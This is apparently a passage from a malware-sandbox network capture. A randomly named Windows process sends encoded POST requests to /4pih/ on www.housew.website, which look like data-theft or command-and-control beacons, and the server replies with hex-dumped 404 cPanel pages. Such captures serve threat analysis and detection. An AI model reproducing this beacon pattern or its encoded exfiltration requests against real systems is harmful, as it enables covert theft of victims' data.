Jan 11, 2025 09:35:57.996575117 CET	1236	IN	Data Raw: 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 Data Ascii: status-reason">Not Found</span> </section> <section class="contact-info"> Please forward this error screen to www.callyur.shop's <a href="mailto:hosting-notifications.com?subject=Error message [] for w
Jan 11, 2025 09:35:57.996613026 CET	334	IN	Data Raw: 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 34 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d 22 63 50 61 6e 65 6c 2c 20 49 6e 63 2e 22 3e 0a 20 20 20 20 20 20 20 20 20 Data Ascii: logolink&utm_campaign=404referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyright 2016 cPanel, Inc.<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49993	203.161.46.205	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:36:03.047672987 CET	819	OUT	POST /4pih/ HTTP/1.1 Host: www.housew.website Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 216 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.housew.website Referer: http://www.housew.website/4pih/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 55 6b 6e 51 44 55 68 44 4c 6c 5a 32 61 51 32 53 56 76 42 37 46 48 4b 7a 49 71 65 74 64 71 4d 4d 2b 65 66 33 32 77 72 71 6d 43 53 2b 6a 32 6d 6f 4d 35 38 77 36 68 6c 65 68 73 51 4a 41 54 31 64 77 42 55 4f 56 43 67 41 41 32 4b 47 42 37 6c 45 38 42 30 33 62 63 4b 72 6d 2f 48 66 73 38 48 31 45 33 6d 47 79 37 54 6a 32 51 43 39 7a 77 64 4e 69 63 6f 50 7a 58 50 2b 34 5a 6d 44 4e 53 57 33 52 49 6c 31 32 2b 73 41 5a 58 57 61 6a 76 6c 77 6b 74 55 32 79 2f 6d 76 67 4a 51 77 39 6a 47 78 46 47 66 6b 35 39 48 35 75 32 54 31 59 41 6f 51 31 30 63 2b 75 45 73 2b 45 77 68 38 5a 76 72 5a 43 54 56 47 7a 37 6c 47 64 30 6e 32 77 31 63 4b 33 77 3d 3d Data Ascii: 40G=UknQDUhDLlZ2aQ2SVvB7FHKzIqetdqMM+ef32wrqmCS+j2moM58w6hlehsQJAT1dwBUOVCgAA2KGB7lE8B03bcKrm/Hfs8H1E3mGy7Tj2QC9zwdNicoPzXP+4ZmDNSW3RIl12+sAZXWajvlwktU2y/mvgJQw9jGxFGfk59H5u2T1YAoQ10c+uEs+Ewh8ZvrZCTVGz7lGd0n2w1cK3w==
Jan 11, 2025 09:36:03.650341034 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 08:36:03 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Jan 11, 2025 09:36:03.650367022 CET	1236	IN	Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
Jan 11, 2025 09:36:03.650401115 CET	1236	IN	Data Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
Jan 11, 2025 09:36:03.650434017 CET	1236	IN	Data Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
Jan 11, 2025 09:36:03.650445938 CET	896	IN	Data Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32 Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
Jan 11, 2025 09:36:03.650504112 CET	1236	IN	Data Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20 Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
Jan 11, 2025 09:36:03.650521040 CET	1236	IN	Data Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32 Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
Jan 11, 2025 09:36:03.650542974 CET	448	IN	Data Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
Jan 11, 2025 09:36:03.650686979 CET	1236	IN	Data Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
Jan 11, 2025 09:36:03.650722980 CET	1236	IN	Data Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
Jan 11, 2025 09:36:03.655329943 CET	1236	IN	Data Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49994	203.161.46.205	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:36:05.594736099 CET	839	OUT	POST /4pih/ HTTP/1.1 Host: www.housew.website Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 236 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.housew.website Referer: http://www.housew.website/4pih/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 55 6b 6e 51 44 55 68 44 4c 6c 5a 32 62 7a 2b 53 57 4d 70 37 43 6e 4b 30 57 36 65 74 47 36 4d 32 2b 65 44 33 32 78 2f 45 6d 78 32 2b 6a 53 69 6f 65 6f 38 77 39 68 6c 65 35 38 51 4d 64 6a 31 53 77 42 59 6f 56 44 63 41 41 32 75 47 42 36 56 45 38 57 41 6f 64 4d 4b 6c 79 50 47 35 78 73 48 31 45 33 6d 47 79 37 48 4a 32 51 61 39 30 41 4e 4e 6a 35 63 4d 77 58 50 2f 39 5a 6d 44 63 69 57 7a 52 49 6c 58 32 38 59 71 5a 52 4b 61 6a 72 31 77 6b 63 55 31 72 50 6e 71 74 70 52 39 39 53 79 35 4b 54 72 45 38 4f 72 59 6d 31 76 31 64 32 70 79 76 57 51 53 77 56 55 46 41 79 46 4b 4f 4a 32 73 41 53 52 65 2b 5a 52 6e 43 44 43 63 39 6e 39 4f 68 44 74 30 51 2f 69 74 69 6b 55 36 63 39 36 33 4b 4c 52 73 34 34 77 3d Data Ascii: 40G=UknQDUhDLlZ2bz+SWMp7CnK0W6etG6M2+eD32x/Emx2+jSioeo8w9hle58QMdj1SwBYoVDcAA2uGB6VE8WAodMKlyPG5xsH1E3mGy7HJ2Qa90ANNj5cMwXP/9ZmDciWzRIlX28YqZRKajr1wkcU1rPnqtpR99Sy5KTrE8OrYm1v1d2pyvWQSwVUFAyFKOJ2sASRe+ZRnCDCc9n9OhDt0Q/itikU6c963KLRs44w=
Jan 11, 2025 09:36:06.193027020 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 08:36:06 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Jan 11, 2025 09:36:06.193053007 CET	1236	IN	Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
Jan 11, 2025 09:36:06.193078041 CET	448	IN	Data Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
Jan 11, 2025 09:36:06.193089008 CET	1236	IN	Data Raw: 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31 30 33 2c 31 2e 35 30 33 36 35 20 2d 31 2e 36 Data Ascii: 68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,-0.76581 4.0014
Jan 11, 2025 09:36:06.193099022 CET	1236	IN	Data Raw: 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39 37 31 20 2d 34 2e 37 35 30 33 31 35 2c 31 31 Data Ascii: 49655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,5
Jan 11, 2025 09:36:06.193104982 CET	448	IN	Data Raw: 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e 31 36 36 36 37 20 31 30 2e 37 34 39 39 36 2c 31 32 2e 34 39 39 39 35 20 Data Ascii: 786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.4206
Jan 11, 2025 09:36:06.193265915 CET	1236	IN	Data Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20 Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
Jan 11, 2025 09:36:06.193275928 CET	224	IN	Data Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32 Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.0
Jan 11, 2025 09:36:06.193286896 CET	1236	IN	Data Raw: 30 33 34 32 39 2c 33 37 2e 31 38 31 35 39 20 2d 33 2e 30 36 34 31 35 34 2c 35 34 2e 38 36 30 33 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 Data Ascii: 03429,37.18159 -3.064154,54.86032" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206
Jan 11, 2025 09:36:06.193296909 CET	224	IN	Data Raw: 2e 32 33 32 36 36 20 63 20 2d 35 2e 34 34 30 31 39 32 2c 31 31 2e 35 36 32 35 31 20 2d 31 30 2e 38 38 30 39 35 31 2c 32 33 2e 31 32 36 32 32 20 2d 31 35 2e 38 39 39 36 35 37 2c 33 33 2e 35 36 33 36 38 20 2d 35 2e 30 31 38 37 30 36 2c 31 30 2e 34 Data Ascii: .23266 c -5.440192,11.56251 -10.880951,23.12622 -15.899657,33.56368 -5.018706,10.43747 -9.614414,19.74672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.0660
Jan 11, 2025 09:36:06.198692083 CET	1236	IN	Data Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49995	203.161.46.205	80	1200	C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 09:36:08.147347927 CET	1852	OUT	POST /4pih/ HTTP/1.1 Host: www.housew.website Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Content-Length: 1248 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Origin: http://www.housew.website Referer: http://www.housew.website/4pih/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0) Data Raw: 34 30 47 3d 55 6b 6e 51 44 55 68 44 4c 6c 5a 32 62 7a 2b 53 57 4d 70 37 43 6e 4b 30 57 36 65 74 47 36 4d 32 2b 65 44 33 32 78 2f 45 6d 78 2b 2b 6a 68 71 6f 4d 62 6b 77 38 68 6c 65 6e 73 51 4e 64 6a 31 31 77 46 30 6b 56 44 51 51 41 30 47 47 54 6f 74 45 74 79 63 6f 55 4d 4b 6c 77 50 48 65 73 38 48 67 45 33 32 43 79 37 58 4a 32 51 61 39 30 43 6c 4e 67 73 6f 4d 39 33 50 2b 34 5a 6d 6d 4e 53 57 62 52 49 38 31 32 38 4d 51 5a 6e 36 61 6a 4b 5a 77 6a 2b 73 31 30 2f 6e 6b 73 70 51 75 39 53 76 6e 4b 58 7a 49 38 4f 76 6d 6d 32 2f 31 66 69 49 6b 33 57 52 4d 69 44 41 7a 4c 54 56 4f 4c 59 69 74 4a 67 4e 56 37 62 55 46 43 41 4b 2b 37 55 68 54 30 57 77 55 42 73 58 59 76 58 49 50 63 35 62 73 65 75 39 4a 69 4d 45 6d 39 78 41 44 77 43 55 4b 6e 53 45 34 78 4d 77 34 39 52 39 63 62 66 4d 33 38 2f 66 4e 4d 41 36 4b 4a 32 71 6a 77 65 6f 4b 6c 57 36 78 63 61 50 63 52 55 76 65 65 41 6a 41 6d 34 33 31 6e 63 6f 48 4d 34 59 49 6a 64 36 74 43 67 6e 30 2b 66 63 53 32 75 54 47 53 54 71 6c 6f 55 31 71 62 6e 4e 61 6f 63 6f 62 30 38 [TRUNCATED] Data Ascii: 40G=UknQDUhDLlZ2bz+SWMp7CnK0W6etG6M2+eD32x/Emx++jhqoMbkw8hlensQNdj11wF0kVDQQA0GGTotEtycoUMKlwPHes8HgE32Cy7XJ2Qa90ClNgsoM93P+4ZmmNSWbRI8128MQZn6ajKZwj+s10/nkspQu9SvnKXzI8Ovmm2/1fiIk3WRMiDAzLTVOLYitJgNV7bUFCAK+7UhT0WwUBsXYvXIPc5bseu9JiMEm9xADwCUKnSE4xMw49R9cbfM38/fNMA6KJ2qjweoKlW6xcaPcRUveeAjAm431ncoHM4YIjd6tCgn0+fcS2uTGSTqloU1qbnNaocob084M1ENeToCtWB9kLB7vR6Z4by+tReVoOehj1Z9BujWWXCfLtsZYf6cy9EarjHKBcSaLDlCUOus/5SGv1BPrt9ddjDJGd+rw0rTP5Hh+jdmjF57idBsTLWVpeH6TNfMXIYH0rUXWsPpBjiuYHxp2j0EG5n8ouOiY7CmaqDB9JdDV+/hAr0MGH7kp3UIJaiUICFw9lrL67ACgsZVwA/kRgIqW9IiAREBs3M7RS4x9UK0ttPRFI4jNslvB4eTAmvxd+vRsM7oRp0YDwnndZg+35ZCKrttsuZNslLU8n3mW24j/txuVIJBCiSQNhU+USB/BXk9BFSLQf7ddXeDCD1VrT6EsRVSmEKijKdrSmHL67kbpDfxmS44ZNSUWFwp4HE3xKMuviycI0TFB2JOzBvEx9RX9xwL0zw9LLGmP4T0nMgZ5/knJlhIZQerS+mo6SMwgrzwUEwp4zTYzG1doCNOWXLwKftPFbn9KYFkHa1Zx7c8stXusA2LF/XMNDRAZvAQiw+EtPzB5HMdqGnOJ3FVGfZJXc/r35d/s+2EBz3A36nhj5cfDXBtizaLMhLfj7bX4GiWlRj6hkkPmFSTFVjeffXIg9Zv8pDeNoFR7b/YddXr6xJfhYg5xYITP+wZ8213C0nhaDL4EaKonoumOfbNgoZxCyuTEm83eTqS0 [TRUNCATED]
